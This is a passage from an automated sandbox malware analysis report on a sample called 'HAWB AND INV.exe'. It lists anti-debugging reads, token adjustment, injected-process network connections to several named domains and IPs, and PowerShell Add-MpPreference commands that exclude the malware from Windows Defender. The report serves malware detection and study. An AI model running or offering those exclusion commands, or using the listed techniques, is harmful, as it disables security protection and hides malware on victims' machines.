          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h]23_2_02B553CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h]23_2_02B553CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9131B mov eax, dword ptr fs:[00000030h]23_2_02B9131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h]23_2_02B03B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h]23_2_02B03B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADDB60 mov ecx, dword ptr fs:[00000030h]23_2_02ADDB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8B58 mov eax, dword ptr fs:[00000030h]23_2_02BA8B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADDB40 mov eax, dword ptr fs:[00000030h]23_2_02ADDB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADF358 mov eax, dword ptr fs:[00000030h]23_2_02ADF358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov ecx, dword ptr fs:[00000030h]23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h]23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h]23_2_02B0F0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]23_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B190AF mov eax, dword ptr fs:[00000030h]23_2_02B190AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9080 mov eax, dword ptr fs:[00000030h]23_2_02AD9080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h]23_2_02B53884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h]23_2_02B53884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD58EC mov eax, dword ptr fs:[00000030h]23_2_02AD58EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov ecx, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]23_2_02B6B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]23_2_02AEB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]23_2_02B0002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]23_2_02B57016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h]23_2_02BA4015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h]23_2_02BA4015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B92073 mov eax, dword ptr fs:[00000030h]23_2_02B92073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1074 mov eax, dword ptr fs:[00000030h]23_2_02BA1074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h]23_2_02AF0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h]23_2_02AF0050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]23_2_02B551BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h]23_2_02B061A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h]23_2_02B061A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B569A6 mov eax, dword ptr fs:[00000030h]23_2_02B569A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02990 mov eax, dword ptr fs:[00000030h]23_2_02B02990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFC182 mov eax, dword ptr fs:[00000030h]23_2_02AFC182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A185 mov eax, dword ptr fs:[00000030h]23_2_02B0A185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]23_2_02ADB1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B641E8 mov eax, dword ptr fs:[00000030h]23_2_02B641E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h]23_2_02B0513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h]23_2_02B0513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov ecx, dword ptr fs:[00000030h]23_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]23_2_02AD9100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC962 mov eax, dword ptr fs:[00000030h]23_2_02ADC962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h]23_2_02ADB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h]23_2_02ADB171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h]23_2_02AFB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h]23_2_02AFB944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B546A7 mov eax, dword ptr fs:[00000030h]23_2_02B546A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]23_2_02BA0EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FE87 mov eax, dword ptr fs:[00000030h]23_2_02B6FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE76E2 mov eax, dword ptr fs:[00000030h]23_2_02AE76E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B016E0 mov ecx, dword ptr fs:[00000030h]23_2_02B016E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8ED6 mov eax, dword ptr fs:[00000030h]23_2_02BA8ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B18EC7 mov eax, dword ptr fs:[00000030h]23_2_02B18EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8FEC0 mov eax, dword ptr fs:[00000030h]23_2_02B8FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B036CC mov eax, dword ptr fs:[00000030h]23_2_02B036CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8FE3F mov eax, dword ptr fs:[00000030h]23_2_02B8FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADE620 mov eax, dword ptr fs:[00000030h]23_2_02ADE620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h]23_2_02B0A61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h]23_2_02B0A61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]23_2_02ADC600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B08E00 mov eax, dword ptr fs:[00000030h]23_2_02B08E00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91608 mov eax, dword ptr fs:[00000030h]23_2_02B91608
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE766D mov eax, dword ptr fs:[00000030h]23_2_02AE766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFAE73 mov eax, dword ptr fs:[00000030h]23_2_02AFAE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE7E41 mov eax, dword ptr fs:[00000030h]23_2_02AE7E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h]23_2_02B9AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AE44 mov eax, dword ptr fs:[00000030h]23_2_02B9AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57794 mov eax, dword ptr fs:[00000030h]23_2_02B57794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE8794 mov eax, dword ptr fs:[00000030h]23_2_02AE8794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B137F5 mov eax, dword ptr fs:[00000030h]23_2_02B137F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0E730 mov eax, dword ptr fs:[00000030h]23_2_02B0E730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h]23_2_02AD4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD4F2E mov eax, dword ptr fs:[00000030h]23_2_02AD4F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h]23_2_02B6FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FF10 mov eax, dword ptr fs:[00000030h]23_2_02B6FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h]23_2_02BA070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA070D mov eax, dword ptr fs:[00000030h]23_2_02BA070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFF716 mov eax, dword ptr fs:[00000030h]23_2_02AFF716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h]23_2_02B0A70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A70E mov eax, dword ptr fs:[00000030h]23_2_02B0A70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEFF60 mov eax, dword ptr fs:[00000030h]23_2_02AEFF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8F6A mov eax, dword ptr fs:[00000030h]23_2_02BA8F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEEF40 mov eax, dword ptr fs:[00000030h]23_2_02AEEF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE849B mov eax, dword ptr fs:[00000030h]23_2_02AE849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B914FB mov eax, dword ptr fs:[00000030h]23_2_02B914FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56CF0 mov eax, dword ptr fs:[00000030h]23_2_02B56CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8CD6 mov eax, dword ptr fs:[00000030h]23_2_02BA8CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0BC2C mov eax, dword ptr fs:[00000030h]23_2_02B0BC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA740D mov eax, dword ptr fs:[00000030h]23_2_02BA740D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B91C06 mov eax, dword ptr fs:[00000030h]23_2_02B91C06
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B56C0A mov eax, dword ptr fs:[00000030h]23_2_02B56C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF746D mov eax, dword ptr fs:[00000030h]23_2_02AF746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]23_2_02B6C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6C450 mov eax, dword ptr fs:[00000030h]23_2_02B6C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A44B mov eax, dword ptr fs:[00000030h]23_2_02B0A44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B01DB5 mov eax, dword ptr fs:[00000030h]23_2_02B01DB5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B035A1 mov eax, dword ptr fs:[00000030h]23_2_02B035A1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]23_2_02BA05AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA05AC mov eax, dword ptr fs:[00000030h]23_2_02BA05AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD2D8A mov eax, dword ptr fs:[00000030h]23_2_02AD2D8A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]23_2_02B0FD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FD9B mov eax, dword ptr fs:[00000030h]23_2_02B0FD9B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02581 mov eax, dword ptr fs:[00000030h]23_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B88DF1 mov eax, dword ptr fs:[00000030h]23_2_02B88DF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]23_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E0 mov eax, dword ptr fs:[00000030h]23_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9FDE2 mov eax, dword ptr fs:[00000030h]23_2_02B9FDE2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\HAWB AND INV.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.premier-moment.info
          Source: C:\Windows\explorer.exeDomain query: www.dinkoistmatrimony.com
          Source: C:\Windows\explorer.exeDomain query: www.vipbrandwatch.info
          Source: C:\Windows\explorer.exeDomain query: www.networkingmaderas.com
          Source: C:\Windows\explorer.exeDomain query: www.curvygirlholiday.com
          Source: C:\Windows\explorer.exeDomain query: www.ecosanhn.com
          Source: C:\Windows\explorer.exeNetwork Connect: 181.214.142.2 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.57.119 80
          Source: C:\Windows\explorer.exeNetwork Connect: 202.254.234.152 80
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Maps a DLL or memory area into another processShow sources
